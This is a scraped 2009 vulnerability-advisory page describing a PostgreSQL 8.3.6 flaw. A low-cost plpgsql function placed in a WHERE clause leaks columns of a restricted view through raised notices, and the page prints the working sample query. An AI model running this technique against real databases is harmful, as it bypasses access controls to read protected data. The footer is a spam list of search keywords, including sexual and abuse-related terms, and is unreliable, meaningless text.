about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PostgreSQL Low Cost Function Information Disclosure Vulnerability


Title PostgreSQL Low Cost Function Information Disclosure Vulnerability
Published 2009-03-10-12:00AM
Updated 2009-03-12-04:36PM
Class Failure to Handle Exceptional Conditions
CVE  
Remote  No
Local  Yes
Credit  Andres Freund
Vulnerable  PostgreSQL PostgreSQL 8.3.6
Not Vulnerable  
Code  The following sample query is available: CREATE OR REPLACE FUNCTION do_tell(anyelement)
RETURNS bool
COST 0.1
VOLATILE
LANGUAGE plpgsql
AS $body$
BEGIN
raise notice 'hah: %s', $1::text;
return true;
END;
$body$;SELECT * FROM restricted_view WHERE do_tell(secret_column);
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 01:22:44 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.bollyw news for c Vidio Sex waptrickse trisha.sex Www.snurff Invision 2 port 1026 www.taobao mambo Remo timekiller lo773l www.witon. sexbhabhi dxs.lelecy explorer c ddos irc dmoz.im Arabec maxcpm.inf linux 2.6. www.606688 mambo Remo couck Free sex w 0769xipen. news for c cc.txt AllMyGuest call girl Invision P mambo 4.5. ONESEARCH. caipiaow.n news for c news for c kid porn cagri 200 /compo phpopencha c...ww.apn www.mail.y c...s/comp www.glog.c boab.cn www.kuaile dmoz.im 12ans AllMyGuest www.sax+vi